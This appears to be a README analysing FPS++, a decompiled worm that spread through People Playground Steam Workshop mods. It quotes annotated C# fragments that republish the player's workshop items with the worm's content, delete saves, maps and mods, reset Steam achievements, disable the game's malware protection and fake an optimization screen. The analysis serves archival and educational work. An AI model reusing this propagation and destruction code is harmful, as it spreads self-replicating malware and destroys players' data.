FPSPlusPlus-malware

Decompiled malware samples from the People Playground workshop malware FPS++.

This is a malware sample from the PPG malware attack. It is for educational and archival purposes only. Executing this code may have negative consequences.

If you are infected, there is no way to restore your files. Don't play with malware, kids.

As the malware has been blocked from executing in the latest People Playground versions, it should be mostly safe. However, misusing any malware samples is not a good idea.

The compiled .dll FPSPlusPlus.dll should not be executed under any circumstances and is included only for accuracy. Source code is available one directory up.

Full credit to maksim10411072 for his source code and DLL decompiling of the malware.

Additional credit to Wevls for their contributions to the early analysis.

Full Analysis

The malicious script worked as a self-propagating worm, infecting Steam Workshop mods for People Playground. This is what FPSPlusPlus.entry.cs (originally compiled as FPSPlusPlus.dll) actually does:

1. The script first identifies, modifies, and republishes all player-published Steam Workshop items, changing their metadata to point to FPS++'s own files.

await shit.Edit()
    .WithContent(m.MetaLocation)          // ← changing the metadata to FPS++'s own MetaLocation
    .WithTag("Mods")
    .WithDescription((Random.Range(0, 2) == 1) 
        ? shit.Description                // keeps original description
        : shit.Description + "\noptimized!")  // or adds "optimized!" 
    .SubmitAsync();

This way, every time an infected mod is downloaded and executed, it will work as a copy of the worm.

2. The worm then proceeds to upvote and favorite both the original mod (now malicious) and any other content it may have infected. This helps increase its visibility and reach.

await shit.Value.Vote(up: true); // liking content on Steam
await shit.Value.AddFavorite(); // adding it to favorites

It also creates a new public workshop item with the malicious code.

await Editor.NewCommunityFile.WithPublicVisibility()
    .WithContent(m.MetaLocation) //  ← again, changing the metadata to FPS++'s own MetaLocation
    .SubmitAsync();

3. The next step is the disabling of all competing mods except itself, or any mods created by "Microsoft Word", making sure it remains as the only active mod.

Directory.Delete("Maps", recursive: true);
Directory.Delete("Contraptions", recursive: true);
File.Delete("config.json");

4. After infecting everything and disabling all mods, the worst part yet starts. It starts by deleting all game saves, configurations, player-created maps, preferred settings, mods, and even saved contraptions.

File.Delete("config.json"); // ← deleting config files
File.Delete("ControlScheme.json");

Directory.Delete("CompiledModAssemblies", recursive: true); // ← deleting mods

File.Delete("People Playground_Data/tc.bin"); // ← deleting other game data
Directory.Delete("Maps", recursive: true); // ← deleting maps
Directory.Delete("Contraptions", recursive: true); // ← deleting contraptions

Then it wipes all player Steam achievements and deletes all statistics.

SteamUserStats.ResetAll(includeAchievements: true); // ← revoking Steam achievements
File.Delete("stats"); // ← deleting stats

5. The script itself also turns off RejectShadyCode (PPG's malware protection option), allowing more copies of the same code to run without being flagged as malicious for containing assemblies.

UserPreferenceManager.Current.RejectShadyCode = false;

---

While the worm infects and destroys the files, everything looks normal in-game. The script is programmed to display your current FPS multiplied by 3, to make it look like it's optimizing the game.

UserPreferenceManager.Current = new Preferences
{    ShowFramerate = true,      // forces FPS display to be on
    FramerateLimit = 10000     // sets super high FPS limit
};
UserPreferenceManager.Save();

    try
				{int num = int.Parse(ihatethis.Text.text.Substring(0, ihatethis.Text.text.Length - 4)) * 3; // ← faking high FPS (displaying triple your current real FPS)
					ihatethis.Text.text = num + " fps";}
    catch
				{ihatethis.Text.text = "958";} // ← if it fails, it just fixes the FPS display to 958

DialogBox dialogBox = DialogBoxManager.Dialog("Optimization of the game..."); // ← showing fake optimization message

// all the destruction code is executed

dialogBox.Close();
DialogBoxManager.Notification("Optimization of the game completed!"); // ← showing fake "game optimized" message

All of these steps happen within a couple of seconds, so players have absolutely no chance of disabling it. Once you notice the FPS++ files in your mods folder, the damage is already long done.